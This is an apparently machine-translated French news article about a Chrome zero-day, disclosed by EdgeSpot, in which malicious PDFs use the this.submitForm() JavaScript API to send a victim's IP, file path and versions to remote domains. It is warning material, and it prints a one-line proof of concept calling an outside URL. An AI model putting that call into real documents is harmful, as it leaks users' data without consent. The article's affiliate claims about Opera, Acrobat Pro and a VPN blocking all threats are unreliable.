Friendoffriends
Le service de détection des exploits EdgeSpot a découvert une intrigante vulnérabilité zero-day de Chrome exploitant des documents PDF.
La vulnérabilité permet aux attaquants de récolter des données sensibles à l'aide de documents PDF malveillants ouverts dans Chrome.
Dès que la victime ouvre les fichiers PDF respectifs dans Google Chrome, un programme malveillant commence à fonctionner en arrière-plan en collectant des données utilisateur.
Les données sont ensuite transmises au serveur distant qui est contrôlé par les pirates. Vous vous demandez peut-être quelles données sont aspirées par les attaquants, ils ciblent les données suivantes sur votre PC:
- adresse IP
- Chemin complet du fichier PDF sur le système
- Versions OS et Chrome
Méfiez-vous des fichiers PDF contenant des logiciels malveillants
Les experts ont repéré que l'un des deux domaines readnotify [.] com ou burpcollaborator [.] net recevait les données.
Ils ont révélé que les attaquants utilisent le this.submitForm () API Javascript PDF pour collecter les informations sensibles des utilisateurs.
Nous l'avons testé avec un PoC minimal, un simple appel API comme this.submitForm ("http://google.com/test") fera en sorte que Google Chrome envoie les données personnelles à google.com.
Ce bogue de Chrome était exploité par deux ensembles distincts de fichiers PDF malveillants, tous deux diffusés respectivement en octobre 2017 et septembre 2018..
Notamment, les données collectées peuvent être utilisées par les attaquants pour affiner les attaques à l'avenir. Les rapports suggèrent que le premier lot de fichiers a été compilé à l'aide du service de suivi PDF de ReadNotify.
Les utilisateurs peuvent utiliser le service pour suivre les vues des utilisateurs. EdgeSpot n'a partagé aucun détail concernant la nature du deuxième ensemble de fichiers PDF.
Conseil rapide: changez votre navigateur pour Opera
En ces temps difficiles, nous sommes attaqués par des logiciels malveillants, du phishing et des chevaux de Troie à chaque étape, nous devons donc être beaucoup plus vigilants et rester protégés.
Et comme il s'agit d'un problème spécifique à Chrome, vous pouvez éviter cette menace et toutes les autres avec un navigateur axé sur la sécurité comme Opera.
Ce navigateur est livré avec un bloqueur de publicités intégré qui non seulement efface ces distractions, mais bloque également les scripts d'analyse, les pixels de suivi et les méthodes pour collecter vos données.
Et si vous voulez être absolument sûr de rester à l'écart de tout danger, profitez du service VPN intégré qui est 100% gratuit à utiliser pendant une durée illimitée.
Opéra
Opera offre la protection parfaite contre les menaces avec le bloqueur de publicité intégré et le service VPN gratuit! Obtenir gratuitement Visitez le site WebComment puis-je rester protégé contre les vulnérabilités PDF?
Télécharger Adobe Acrobat PRO
Adobe et Chrome font un bon match en ce qui concerne la gestion des fichiers PDF. En installant l'extension Adobe pour Chrome, vous pouvez consulter et manipuler les fichiers PDF à votre guise sans quitter votre navigateur préféré..
Malgré sa structure robuste, les logiciels malveillants cachés dans les fichiers PDF peuvent ne pas être détectés si vous utilisez la version standard du Reader..
La version professionnelle est recommandée pour garantir votre protection et garder vos données à l'écart des pirates.
Bien que ce ne soit pas gratuit, le prix que vous paierez est plutôt faible pour la pléthore de fonctionnalités supplémentaires dont vous bénéficierez, notamment la sécurité renforcée de vos fichiers PDF.
Un essai gratuit de 7 jours est également inclus afin que vous puissiez avoir un avant-goût de l'expérience Pro complète avant de faire l'achat..
Adobe Acrobat PRO
Éloignez-vous des logiciels malveillants en téléchargeant Adobe Acrobat PRO. Il a beaucoup plus de fonctionnalités que la version gratuite et protège vos données. Essai gratuit Visitez le site Web En savoir plusSi vous souhaitez être en sécurité lorsque vous surfez sur Internet, vous devrez vous procurer un outil entièrement dédié pour sécuriser votre réseau. Installez l'accès Internet privé maintenant et sécurisez-vous. Il protège votre PC contre les attaques lors de la navigation, masque votre adresse IP et bloque tout accès indésirable.
Le service de détection d'exploit EdgeSpot voulait alerter les utilisateurs de Chrome sur les risques potentiels car le correctif ne devrait pas être publié dans un proche avenir..
EdgeSpot a signalé à Google la vulnérabilité l'année dernière et la société a promis de publier un correctif fin avril.
Cependant, vous pouvez envisager d'utiliser une solution temporaire au problème en affichant localement les documents PDF reçus à l'aide d'une autre application de lecture..
Vous pouvez également ouvrir vos documents PDF dans Chrome en déconnectant vos systèmes d'Internet.
FAQ: en savoir plus sur les extensions Chrome
- Privacy Badger fonctionne-t-il avec Chrome?
Oui. Mais si vous souhaitez une sélection plus large, explorez nos meilleurs choix pour les extensions de confidentialité Chrome dans ce guide complet.
- Pouvez-vous modifier des PDF dans Chrome?
Il existe de nombreuses extensions qui permettent le traitement des PDF. Consultez notre excellent guide sur les meilleures extensions PDF pour Chrome.
- Google a-t-il un générateur de code QR?
Ce n'est pas le cas, mais vous pouvez l'activer rapidement. Voici notre guide complet sur la façon d'activer le générateur de code QR dans Chrome.
Note de l'éditeur: Cet article a été initialement publié en avril 2020 et a depuis été remanié et mis à jour en août 2020 pour plus de fraîcheur, de précision et d'exhaustivité.
- La cyber-sécurité
